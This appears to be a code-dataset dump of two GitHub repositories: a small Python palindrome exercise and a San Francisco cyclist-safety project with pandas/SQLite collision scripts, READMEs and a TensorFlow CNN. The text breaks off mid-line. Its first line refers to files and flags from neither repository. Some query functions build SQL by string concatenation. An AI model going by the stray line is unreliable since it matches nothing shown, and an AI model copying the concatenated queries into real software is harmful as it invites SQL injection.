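These correspond to `kl_cost_var` and `reverse_kl_cost_var` in core.py; swapping one for the other is exactly the `--divtypet kl` vs `--divtypet rkl` choice exposed by run.py and main.py.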
srinitishkp/SumPalin
https://github.com/srinitishkp/SumPalin
01fabe73f36d7f370373fe17b085178ef8327b0f
e873d3e3c4156f23006092807e006dee8db6137b
fe0fc5425cb89da511bf4b9aa7562183a80edd9b
refs/heads/main
2023-08-02T14:47:43.234379
2021-10-03T07:15:49
2021-10-03T07:15:49
413,005,073
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5534290075302124, "alphanum_fraction": 0.5725677609443665, "avg_line_length": 23.153846740722656, "blob_id": "d89f636612e58937f100aacf3aac273118559f9e", "content_id": "a020ff549038b0cfac6a06d3b8bccf48c2d505ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 627, "license_type": "no_license", "max_line_length": 75, "num_lines": 26, "path": "/sumPalin.py", "repo_name": "srinitishkp/SumPalin", "src_encoding": "UTF-8", "text": "def rev(a):\n temp=a\n r=0\n rev=0\n while(a>0):\n r=a%10\n rev=rev*10+r\n a=int(a/10)\n return rev\ndef checkPalin(temp,rev): \n if(temp==rev):\n return True\n else :\n return False\nnum=int(input(\"Enter a 2 or 3 digit number:\"))\nprint(\"Initially sum is the given number:\")\nfor i in range(5):\n print(\"Current sum:\",num,\"Reverse:\",rev(num))\n num=num+rev(num)\n if(checkPalin(num,rev(num))):\n break\nprint(\"\\nFinal sum after loop:\",num,\"\\nFinal reverse after loop:\",rev(num))\nif(num==rev(num)):\n print(\"\\nPalindrome\")\nelse:\n print(\"\\nNot a palindrome\")" }, { "alpha_fraction": 0.7578125, "alphanum_fraction": 0.76171875, "avg_line_length": 62.5, "blob_id": "c0728a2eb6bc9a83d6a6621f3b0b00ce87432935", "content_id": "dbf28fade4f3f0bebc3c97998e47f1ea66e2094c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 256, "license_type": "no_license", "max_line_length": 107, "num_lines": 4, "path": "/README.md", "repo_name": "srinitishkp/SumPalin", "src_encoding": "UTF-8", "text": "# SumPalin\nget a three or two digit no. and add it to the reversed no. check whether the sum is palindrome if not \nadd it to the reversed sum again and check whether it is palin. continue until the sum is palin or stop if \nthe no. of iteration reaches 5\n \n" } ]
2
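The SumPalin record above spells the reverse-and-add loop out digit by digit; the same procedure in a compact string-based form (a sketch equivalent to sumPalin.py, with the 5-iteration cap taken from its README):

```python
def reverse_and_add(num, max_iters=5):
    # Repeatedly add the digit-reversal; stop early once the sum is a palindrome.
    for _ in range(max_iters):
        num += int(str(num)[::-1])
        if str(num) == str(num)[::-1]:
            break
    return num

print(reverse_and_add(87))  # 87 -> 165 -> 726 -> 1353 -> 4884 (a palindrome)
```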
pokeritney/Safe_Street_Cyclist
https://github.com/pokeritney/Safe_Street_Cyclist
e59f800750b456d76429604458439d0ccf8c5df9
daed3480ec05484255c45535b89a26e41cd3818b
f29d725f11b7ae3e4d7e5af589aba6c6ee8001ef
refs/heads/master
2020-12-13T16:19:47.972129
2020-02-20T00:34:35
2020-02-20T00:34:35
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6712328791618347, "alphanum_fraction": 0.6925418376922607, "avg_line_length": 35.55555725097656, "blob_id": "d44d0f90682281c604c35d3ba105c3baa9a1ebbc", "content_id": "02a6fb6abf532f98bfe6ce4a10519427f28164bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 657, "license_type": "no_license", "max_line_length": 97, "num_lines": 18, "path": "/team64final/CODE/Viz/README.txt", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "============Below is a draft for TA, feel free to add===========\n1. Navigate to the project directory, \nIn the command shell, run the following command\n$ python -m http.server\n\n2. This will set up a local host in your computer\nA local server address will appear in the shell, copy that address and paste it into your browser\nIn case no address is displayed, enter http://0.0.0.0:8000/index.html\nHit okay, you are then in Safe Street for Cyclist's interface\n\n\n=========Below is for team 64 members===========\n1. Use python to set up local host\n\n-Static - All static files\n -css style\n -res: data files to load in html file\n-Lib - d3 file folder" }, { "alpha_fraction": 0.48111391067504883, "alphanum_fraction": 0.5076285004615784, "avg_line_length": 21.415283203125, "blob_id": "d26c3e6c462d66e59e0ed6bbed866d71d836e788", "content_id": "d2f422d923183ef42bb6396abad6953c05bd874d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6751, "license_type": "no_license", "max_line_length": 122, "num_lines": 301, "path": "/Database/TransBase/st_collision_sgmt_level.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# ### This notebook shapes collision data to street segment level and compute all model features needed to the same level.\n\n# 1. Set-up\n\n# In[27]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom pandas import read_sql\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\npd.set_option('display.max_colwidth', -1)\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\n\n\n# 2. load data \n\n# In[25]:\n\n\n# main table with case-level collision record\ndf = pd.read_csv('transbase_collision.csv')\n\n# mapping table with traffic volume for each street segment\ndf_2 = pd.read_csv('st_sgmt_trnsprtn.csv')\n\n\n# In[4]:\n\n\n# preview main table\n\ndf.head()\n\n\n# In[5]:\n\n\n# preview main table\n\ndf.describe()\n\n\n# In[31]:\n\n\n# select the cols we need\n\ndf_select = df[['case_id_pkey','cnn_sgmt_fkey', 'collision_severity', 'pcf_viol_category', 'road_cond_1']]\n\n\n# In[32]:\n\n\n# preview selected cols\n\ndf_select.head()\n\n\n# 3. 
Transform columns before aggregation\n# - step 1: frequency count of all the categorical variables needed\n# - step 2: convert categorical vars into numeric ones so that they can be agged down the line to segment level\n\n# In[ ]:\n\n\n# 3.1 collision_severity\n\n\n# In[21]:\n\n\ndf_select['collision_severity'].value_counts()\n\n\n# In[ ]:\n\n\n# mapping rule\n\n# Injury (Other Visible) 4\n# Injury (Complaint of Pain) 3\n# Injury (Severe) 2 \n# Fatal 1\n\n\n# In[34]:\n\n\n# convert!\n\ndf_select['cs_injury_4'] = np.where(df_select['collision_severity'] == 'Injury (Other Visible)', 1, 0)\ndf_select['cs_injury_3'] = np.where(df_select['collision_severity'] == 'Injury (Complaint of Pain)', 1, 0)\ndf_select['cs_injury_2'] = np.where(df_select['collision_severity'] == 'Injury (Severe)', 1, 0)\ndf_select['cs_injury_1'] = np.where(df_select['collision_severity'] == 'Fatal', 1, 0)\n\n\n# In[ ]:\n\n\n# 3.2 pcf_viol_category\n\n\n# In[23]:\n\n\ndf_select['pcf_viol_category'].value_counts()\n\n\n# In[ ]:\n\n\n# mapping rule: if associated with road attributes then 1 else 0 \n\n# Improper Turning 0\n# Automobile Right of Way 0\n# Unsafe Speed 0\n# Other Hazardous Violation 0\n# Traffic Signals and Signs 1\n# Wrong Side of Road 0\n# Improper Passing 0\n# Unknown 0\n# Unsafe Lane Change 0\n# Not Stated 0\n# Other Than Driver (or Pedestrian) 0 \n# Unsafe Starting or Backing 0 \n# Following Too Closely 0 \n# Pedestrian Violation 0 \n# Lights 0 \n# Other Improper Driving 0 \n# Pedestrian Right of Way 0 \n# Driving or Bicycling Under the Influence of Alcohol or Drug 0 \n# Impeding Traffic 0 \n# Brakes 0 \n# Other Equipment 0 \n\n\n# In[33]:\n\n\n# convert!\n\ndf_select['pcf_viol_category_is_st'] = np.where(df_select['pcf_viol_category'] == 'Traffic Signals and Signs', 1, 0)\n\n\n# In[ ]:\n\n\n# 3.3 road_cond_1\n\n\n# In[24]:\n\n\ndf_select['road_cond_1'].value_counts()\n\n\n# In[ ]:\n\n\n# mapping rule: only assign a code number for values associated with road characteristics\n\n# No Unusual Condition 0\n# Other 0 \n# Holes, Deep Ruts 1 \n# Not Stated 0 \n# Construction or Repair Zone 2 \n# Loose Material on Roadway 3 \n# Obstruction on Roadway 4 \n# Reduced Roadway Width 5 \n\n\n# In[35]:\n\n\n# convert!\n\ndf_select['road_cond_new_1'] = np.where(df_select['road_cond_1'] == 'Holes, Deep Ruts', 1, 0)\ndf_select['road_cond_new_2'] = np.where(df_select['road_cond_1'] == 'Construction or Repair Zone', 1, 0)\ndf_select['road_cond_new_3'] = np.where(df_select['road_cond_1'] == 'Loose Material on Roadway', 1, 0)\ndf_select['road_cond_new_4'] = np.where(df_select['road_cond_1'] == 'Obstruction on Roadway', 1, 0)\ndf_select['road_cond_new_5'] = np.where(df_select['road_cond_1'] == 'Reduced Roadway Width', 1, 0)\n\n\n# 4. Merge main table and the secondary table\n\n# In[42]:\n\n\n# preview main table (filtered version)\n\ndf_select.head()\n\n\n# In[50]:\n\n\n# filter secondary table with cols needed\n\ndf_2_select = df_2[['cnn_sgmt_pkey', 'daily_ride_qrt', 'daily_ride_eght', 'speed_avg_mta']]\n\n\n# In[51]:\n\n\n# preview filtered version\n# speed_avg_mta has a lot of null values\n\ndf_2_select.describe()\n\n\n# In[53]:\n\n\n# merge\n\ndf_3 = df_select.merge(df_2_select, left_on = 'cnn_sgmt_fkey', right_on = 'cnn_sgmt_pkey', how = 'inner')\n\n\n# In[54]:\n\n\ndf_3.describe()\n\n\n# In[55]:\n\n\ndf_3.head()\n\n\n# 5. 
group by segment key and agg all features to segment level\n\n# In[58]:\n\n\ndf_sgmt = df_3.groupby('cnn_sgmt_fkey').agg({'case_id_pkey':'size',\n                                             'pcf_viol_category_is_st':'sum',\n                                             'cs_injury_4':'sum',\n                                             'cs_injury_3':'sum',\n                                             'cs_injury_2':'sum',\n                                             'cs_injury_1':'sum',\n                                             'road_cond_new_1':'sum',\n                                             'road_cond_new_2':'sum',\n                                             'road_cond_new_3':'sum',\n                                             'road_cond_new_4':'sum',\n                                             'road_cond_new_5':'sum',\n                                             'daily_ride_qrt':'sum',\n                                             'daily_ride_eght':'sum',\n                                             'speed_avg_mta':'mean' \n                                             }).reset_index()\n\n\n# In[62]:\n\n\ndf_sgmt.head(10)\n\n\n# In[60]:\n\n\ndf_sgmt.describe()\n\n\n# 6. compute y\n\n# In[65]:\n\n\n# Number of collision/total_trips (measured by daily_ride_qrt)\ndf_sgmt['y_1'] = df_sgmt['case_id_pkey'] * 1. / df_sgmt['daily_ride_qrt']\n\n# Number of collision/total_trips (measured by daily_ride_eght)\ndf_sgmt['y_2'] = df_sgmt['case_id_pkey'] * 1. / df_sgmt['daily_ride_eght']\n\n\n# In[66]:\n\n\ndf_sgmt.head(20)\n\n\n# In[67]:\n\n\ndf_sgmt.to_csv('df_sgmt_agg_20191106.csv', index = False)\n\n\n# In[ ]:\n\n\n\n\n" }, { "alpha_fraction": 0.6730901598930359, "alphanum_fraction": 0.6925418376922607, "avg_line_length": 32.02777862548828, "blob_id": "88f2dc2a5ace9b4308eb4694234126e95df54aeb", "content_id": "ea8235ac5895313e6aaf80d35cc3948818e3264d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 98, "num_lines": 36, "path": "/Scripts/Filter_collision_data_Selene 2.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport sqlite3 as db\nimport os\nimport io\n\ndb_name = \"input_database_name\"\ncollision = db.connect(db_name)\n\n#For day_of_week, weather, collision_severity, primary_coll_factor, pcf_viol_category, road_cond_1\ndef filter_collision(col_name = \"day_of_week\", select = \"Sunday\"):\n    query = 'SELECT * FROM collision WHERE ' + col_name + '=\"' + select + '\"'\n    collision_filtered = pd.read_sql_query(query, collision)\n    return collision_filtered\n\n#For collision_time, NOT SURE HOW WE SHOULD PARSE THIS COLUMN\ndef filter_time(select = \"Morning\"):\n    time_category = [\"Morning\", \"Afternoon\", \"Sunset\", \"Night\"]\n    if select == \"Morning\":\n        query = '''SELECT * FROM collision \n        WHERE collision_time BETWEEN 600 AND 1200'''\n        collision_filtered = pd.read_sql_query(query, collision)\n        return collision_filtered\n\ndef query(col_name, select):\n    if col_name == \"collision_time\":\n        collision_filtered = filter_time(select)\n    else:\n        collision_filtered = filter_collision(col_name, select)\n    return collision_filtered\n\ndef main():\n    data_interested = query(\"day_of_week\", \"Sunday\")\n    print(data_interested)\n\nif __name__ == '__main__':\n    main()" }, { "alpha_fraction": 0.6135135293006897, "alphanum_fraction": 0.616216242313385, "avg_line_length": 20.764705657958984, "blob_id": "aaadd793861ce7e07e35d132a785f6052f2e1e8c", "content_id": "f5301bbaed5be8b258f0497dc024fa6231343548", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 370, "license_type": "no_license", "max_line_length": 66, "num_lines": 17, "path": "/Scripts/collision_by_hour.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport pandas as pd\ndata = pd.read_csv(\"by_hour.csv\")\ndata = data[[\"Hour\", \"Lane\"]]\n\nrollup = pd.crosstab(index=data['Lane'], 
columns=data['Hour'])\nby_hour = rollup.transpose()\n\nhour = []\nfor i, row in by_hour.iterrows():\n    hour.append({\"hour\":str(i), \"no\":row[\"No\"], \"yes\":row[\"Yes\"]})\n" }, { "alpha_fraction": 0.5930799245834351, "alphanum_fraction": 0.6535087823867798, "avg_line_length": 33.21666717529297, "blob_id": "8dd55e0e2eaf30d5407acd3c79270495c62bf6e3", "content_id": "db1cbe1b88277357a8b65e2e6dae0e5677ef13a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2052, "license_type": "no_license", "max_line_length": 102, "num_lines": 60, "path": "/Scripts/Filter_collision_data.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport sqlite3 as db\nimport os\nimport io\n\n#export_var_select > export_var_select.db\ndb_name = \"export_var_select.db\"\ncollision = db.connect(db_name)\n\n#For day_of_week, weather, collision_severity, primary_coll_factor, pcf_viol_category, road_cond_1\ncategory = [\"Day of Week\", \"Weather\", \"Collision Severity\", \"Primary Collision Factor\",\n\"Violation Category\", \"Road Condition\"]\n\ndef filter_collision(col_name = \"day_of_week\", select = \"Sunday\"):\n    query = 'SELECT * FROM collision WHERE ' + col_name + '=\"' + select + '\"'\n    collision_filtered = pd.read_sql_query(query, collision)\n    return collision_filtered\n\n\ndef multiple_filter(a):\n    '''input a - a list of strings; user's selection\n    e.g., a = [day, weather] and day = All, weather = cloudy\n    return SQL stmt with multiple filters'''\n    col_name = [\"day_of_week\", \"weather_1\"]\n    query = 'SELECT * FROM collision'\n    filters = []\n    for i, c in enumerate(a):\n        if c != \"All\":\n            filters.append(col_name[i] + '=\"' + c + '\"')\n    if filters:\n        query += ' WHERE ' + ' AND '.join(filters)\n    return query\n\n\n#For collision_time\ntime_category = [\"6:00am to 8:59am\", \"9:00am to 11:59am\", \"12:00pm to 14:59pm\", \"15:00pm to 17:59pm\", \n\"18:00pm to 20:59pm\", \"21:00pm to 23:59pm\", \"00:00am to 02:59am\", \"03:00am to 05:59am\"]\n\ntime = [\"600 AND 859\", \"900 AND 1159\", \"1200 AND 1459\", \"1500 AND 1759\",\n\"1800 AND 2059\", \"2100 AND 2359\", \"0 AND 259\", \"300 AND 559\"]\n\ndef filter_time(select = \"6:00am to 8:59am\"):\n    time_val = time[time_category.index(select)]\n    query = \"SELECT * FROM collision WHERE collision_time BETWEEN \" + time_val\n    collision_filtered = pd.read_sql_query(query, collision)\n    return collision_filtered\n\ndef query(col_name, select):\n    if col_name == \"collision_time\":\n        collision_filtered = filter_time(select)\n    else:\n        collision_filtered = filter_collision(col_name, select)\n    return collision_filtered\n\ndef main():\n    data_interested = query(\"day_of_week\", \"Sunday\")\n    print(data_interested)\n\nif __name__ == '__main__':\n    main()" }, { "alpha_fraction": 0.7638404965400696, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 111.26087188720703, "blob_id": "6816f3db2c37a2aadac1b433f9372929713f473c", "content_id": "653fd50d96c44494e6a11f6fccb203255dafb9ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2583, "license_type": "no_license", "max_line_length": 579, "num_lines": 23, "path": "/team64final/readme.txt", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "1. DESCRIPTION - Describe the package in a few paragraphs\n \n    All of our data used to display the final findings is preprocessed. The original data files used to train our model are in the /CODE/Data folder. 
Since the street view pictures used to train the model are too big, we only show a few samples in /CODE/Data/Google_Street_View_Examples. Besides, all the steps used to process our data are saved in the /CODE/Scripts folder. \n\n    Our dataset of bicycle collisions is downloaded from the TIMS & Transbase databases. It is saved under /CODE/Data. Our Google Street View pictures of San Francisco, CA are downloaded from the Google Cloud API. The code used to obtain GSV pictures is in /CODE/Scripts/streetViewAPI.py, and the steps to register for the Google Cloud API are in /CODE/Scripts/GSV_register.txt.\n\n    The training data, i.e., the risk scores we aggregated from the collision data and the street features data, is /CODE/Data/model_data_segment_full_20191109.csv. The steps to process this data are in /CODE/Scripts/model_data_segment_full_20191109.py.\n\n    /CODE/Model contains our trained Random Forest model used to calculate the final composite risk score of each street of San Francisco, CA. The Python script of the trained model is named Open_Image_V4_Object_Detection-inception_resnet_v2.ipynb. Our calculated composite risk score for each street of San Francisco is saved in /CODE/Data/Safe_score_segment.csv, where y2_Scaled is our final score, linearly color-scaled for visualization on the map. The coordinates of each street segment, used to map these streets, are found by /CODE/Scripts/Segment_score_latlon.ipynb. \n    /CODE/Model/CNN_Image_ZH1129.py contains our trained CNN model to evaluate street safety; this model served as a validation approach. \n\n    In /CODE/Viz, index.html is our constructed web app to display our visualization of the data and findings. /Viz/lib contains all the API library files we use. /Viz/static contains all the static files, such as csv/geojson. Please see section 2 to access this web app.\n\n\n2. INSTALLATION - How to install and setup your code\n\n    A. Please navigate to the directory: ~/team64final/CODE/Viz\n    In the command shell, run the following command:\n    $ python -m http.server\n\n    B. This will set up a local host on your computer. \n    (Note: Please use Firefox to view this website.)\n    A local server address will appear in the shell; copy that address and paste it into your browser's address bar. In case no address is displayed, enter http://0.0.0.0:8000/index.html. 
Hit enter, you are then in Safe Street for Cyclist's website.\n\n" }, { "alpha_fraction": 0.5439053773880005, "alphanum_fraction": 0.5840016007423401, "avg_line_length": 36.223880767822266, "blob_id": "c068c98d0f04b7a9cdf082fb389e37a2c6667bc1", "content_id": "74bb5029fe90ecb585a9db4c17e7266f5d31c8d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14964, "license_type": "no_license", "max_line_length": 197, "num_lines": 402, "path": "/team64final/CODE/Model/CNN_Image_ZH1129.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nfrom keras.layers import Input, Dense, Activation, ZeroPadding2D, Flatten, Conv2D\nfrom keras.layers import MaxPooling2D\nfrom keras.models import Model\nfrom keras.preprocessing import image\nfrom keras.models import load_model\nfrom keras import metrics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder\nfrom keras.applications.imagenet_utils import preprocess_input\nfrom IPython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\nfrom keras.utils import plot_model\nfrom PIL import Image\nimport keras.backend as K\nimport tensorflow as tf\nimport keras\nfrom keras.wrappers.scikit_learn import KerasClassifier\nimport csv\nK.set_image_data_format('channels_last')\nfrom matplotlib.pyplot import imshow\nimport os\nimport sys\nimport matplotlib.pyplot as plt\n\nimg_width = 300\nimg_height = 600\nVECTOR_SIZE = 128\nfeatures_SIZE = 7\nBATCH_SIZE = 8\nEPOCHS = 1000\nTRAIN_EXAMPLES = 3849\nTEST_EXAMPLES = 10000\nLR = 0.00001\ndef mean_pred(y_true, y_pred):\n return K.mean(y_pred)\n\n\n# If images have different sizes, we will crop and rotate images. 
The images are all 300*600, so we don't need this step.\n'''def getCropImgs(img, needRotations=False):\n # img = img.convert('L')\n z = np.asarray(img, dtype=np.int8)\n c = []\n for i in range(3):\n for j in range(4):\n crop = z[512 * i:512 * (i + 1), 512 * j:512 * (j + 1), :]\n\n c.append(crop)\n if needRotations:\n c.append(np.rot90(np.rot90(crop)))\n\n # os.system('cls')\n # print(\"Crop imgs\", c[2].shape)\n\n return c '''\n\n# Get the softmax from folder name\ndef getAsSoftmax(fname):\n if (fname == 'b'):\n return [1, 0, 0, 0]\n elif (fname == 'is'):\n return [0, 1, 0, 0]\n elif (fname == 'iv'):\n return [0, 0, 1, 0]\n else:\n return [0, 0, 0, 1]\n\ndef plot_cdf(data):\n data.sort()\n plotDataset = [[],[]]\n count = len(data)\n for i in range(count):\n\n plotDataset[0].append(float(data[i]))\n plotDataset[1].append((i+1)/count)\n plt.figure(figsize=(20,10))\n plt.plot(plotDataset[0], plotDataset[1], '-', linewidth=2)\n plt.show()\n\n\n# Return all images as numpy array, labels\ndef get_imgs_frm_folder(path):\n \n \n\n x_image = []\n y_image = []\n\n cnt = 0\n for filename in os.listdir(path):\n image_path = os.path.join(path, filename)\n img = Image.open(image_path)\n #print(img.size)\n img = img.convert('RGB')\n img = np.asarray(img, np.float16) #(300, 600, 3)\n #print(img.shape)\n '''\n if len(img.shape) == 2:\n img = np.concatenate((img, img, img), axis=-1)\n #img = np.reshape(img,(min_width,min_height,1))\n print\n '''\n x_image.append(np.divide(img, 255.))\n y_image.append(filename)\n cnt += 1\n\n '''\n crpImgs = getCropImgs(img)\n cnt += 1\n if cnt % 10 == 0:\n print(str(cnt) + \" Images loaded\")\n for im in crpImgs:\n x.append(np.divide(np.asarray(im, np.float16), 255.))\n # Image.fromarray(np.divide(np.asarray(im, np.float16), 255.), 'RGB').show()\n y.append( (foldname))\n # print(getAsSoftmax(foldname))\n '''\n print(\"Images cropped\")\n print(\"Loading as array\")\n print(\"count: \",cnt)\n return x_image, y_image, cnt\n\ndef get_one_hot(data, index):\n for i in index:\n tempdata = data[:,i].reshape(-1, 1)\n enc = OneHotEncoder()\n enc.fit(tempdata)\n tempdata = enc.transform(tempdata).toarray()\n data = np.concatenate((data,tempdata),axis=1)\n for i in reversed(index):\n data = np.delete(data,i,axis=1)\n return data\n\n# Load the dataset\ndef load_dataset(image_path,feats_path, ntype):\n print(\"Loading images..\")\n\n train_set_x_orig, train_set_y_orig, cnt = get_imgs_frm_folder(image_path)\n\n feats_train = pd.read_csv(feats_path)\n \n feats_train = feats_train.fillna(method='backfill') #handle the NAN\n print(feats_train.head())\n X_img = []\n #X_fea = []\n Y = []\n cnt = 0\n for i in range(len(train_set_y_orig)):\n sample = []\n cnt += 1\n try: \n seg_id = train_set_y_orig[i].split('_')[1].split('.')[0]\n except:\n X_img.append(train_set_x_orig[i])\n continue\n if len(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])]) == 0:\n continue\n X_img.append(train_set_x_orig[i])\n \n '''\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['num_collisions'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['num_cases_injury_other_visible'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['num_cases_complaint_of_pain'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['num_cases_severe'] )\n 
sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['num_cases_fatal'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['cyc_ntwrk_yn'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['speed_limit'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['pk_metered_cnt'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['pk_on_st_cnt'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['oneway_yn'] )\n sample.append( float(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['daily_ride_qrt'] ))\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['facility_type'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['surface_type'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['sharrow'] )\n X_fea.append(sample)\n '''\n Y.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['y'])\n \n \n X_img = np.array(X_img,dtype = np.float)\n if ntype != \"train\":\n return X_img, 0, 0, 0,train_set_y_orig\n print(\"Y < 0.1 \", len([i for i in Y if i > 0 and i < 0.001]))\n print(\"Y < 0.2 \", len([i for i in Y if i > 0.001 and i < 0.002]))\n print(\"Y < 0.4 \", len([i for i in Y if i > 0.002 and i < 0.004]))\n print(\"Y < 0.6 \", len([i for i in Y if i > 0.004 and i < 0.006]))\n print(\"Y < 0.8 \", len([i for i in Y if i > 0.06 and i < 0.008]))\n print(\"Y < 1.0 \", len([i for i in Y if i > 0.08]))\n print(\"Y max: \",max(Y))\n plot_cdf(Y)\n Y = Y / max(Y)\n print(\"Y < 0.1 \", len([i for i in Y if i > 0 and i < 0.01]))\n print(\"Y < 0.2 \", len([i for i in Y if i > 0.01 and i < 0.02]))\n print(\"Y < 0.4 \", len([i for i in Y if i > 0.02 and i < 0.04]))\n print(\"Y < 0.6 \", len([i for i in Y if i > 0.04 and i < 0.06]))\n print(\"Y < 0.8 \", len([i for i in Y if i > 0.06 and i < 0.08]))\n print(\"Y < 1.0 \", len([i for i in Y if i > 0.08]))\n print(\"Y max: \",max(Y))\n Y = np.array(Y,dtype = np.float).reshape((-1,1))\n\n '''\n X_fea = np.array(X_fea)\n #X_fea[:,10] = X_fea[:,10]/X_fea[:,10].max()\n X_fea = get_one_hot(X_fea,index = [5,9,11,12,13])\n X_fea = np.array(X_fea,dtype = np.float)\n X_fea[:,8] = X_fea[:,8]/X_fea[:,8].max()\n print(X_fea.shape)\n '''\n \n print(X_img.shape)\n \n print(Y.shape)\n x_img_train, x_img_test, y_train, y_test = train_test_split(X_img, Y, train_size=0.90, random_state=33)\n #y_train, y_test = train_test_split(Y,train_size=0.70, random_state=33)\n #x_fea_train, x_fea_test = train_test_split(X_fea, train_size=0.70, random_state=33)\n TRAIN_EXAMPLES = len(x_img_train)\n TEST_EXAMPLES = len(x_img_test)\n\n \n print(\"Data load complete\")\n\n return x_img_train, x_img_test, y_train, y_test, train_set_y_orig\n\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, mean=0.0, stddev=0.01)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape = shape)\n return tf.Variable(initial)\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding = 'SAME')\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize = [1, 2, 2, 1],\n strides = [1, 2, 2, 1], padding = 'SAME')\n\n\ndef train(BATCH_SIZE, epochs,x_img_train, x_img_test, y_train, y_test, name, train_type):#BATCH_SIZE, 
EPOCHS,x_img_train, x_img_test, y_train, y_test, x_fea_train, x_fea_test\n x_img = tf.placeholder(tf.float32,[None, img_width,img_height,3])\n #x_fea = tf.placeholder(tf.float32,[None, x_fea_train.shape[1]])\n keep_prob = tf.placeholder(\"float\")\n y_ = tf.placeholder(\"float\", [None, 1])\n \n x_image = tf.reshape(x_img, [-1, img_width, img_height, 3]) \n W_conv1 = weight_variable([3, 3, 3, 16])\n b_conv1 = bias_variable([16])\n h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n h_pool1 = max_pool_2x2(h_conv1)\n \n W_conv2 = weight_variable([3, 3, 16, 32])\n b_conv2 = bias_variable([32])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n h_pool2 = max_pool_2x2(h_conv2)\n\n W_conv3 = weight_variable([3, 3, 32, 64])\n b_conv3 = bias_variable([64])\n h_conv3 = tf.nn.relu(conv2d(h_pool2, W_conv3) + b_conv3)\n h_pool3 = max_pool_2x2(h_conv3)\n\n W_conv4 = weight_variable([3, 3, 64, 128])\n b_conv4 = bias_variable([128])\n h_conv4 = tf.nn.relu(conv2d(h_pool3, W_conv4) + b_conv4)\n h_pool4 = max_pool_2x2(h_conv4)\n\n W_conv5 = weight_variable([3, 3, 128, 256])\n b_conv5 = bias_variable([256])\n h_conv5 = tf.nn.relu(conv2d(h_pool4, W_conv5) + b_conv5)\n h_pool5 = max_pool_2x2(h_conv5)\n\n\n print(\"h_pool5:\",h_pool5.shape)\n\n W_fc1 = weight_variable([10 * 19 * 256, 2048])\n b_fc1 = bias_variable([2048])\n\n h_pool5_flat = tf.reshape(h_pool5, [-1, 10 * 19 * 256])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool5_flat, W_fc1) + b_fc1)\n print(\"h_fc1:\",h_fc1.shape)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n W_fc0 = weight_variable([2048, 4096])\n b_fc0 = bias_variable([4096])\n cnn_out = tf.matmul(h_fc1_drop, W_fc0) + b_fc0\n \n W_fc2 = weight_variable([4096, 2048])\n b_fc2 = 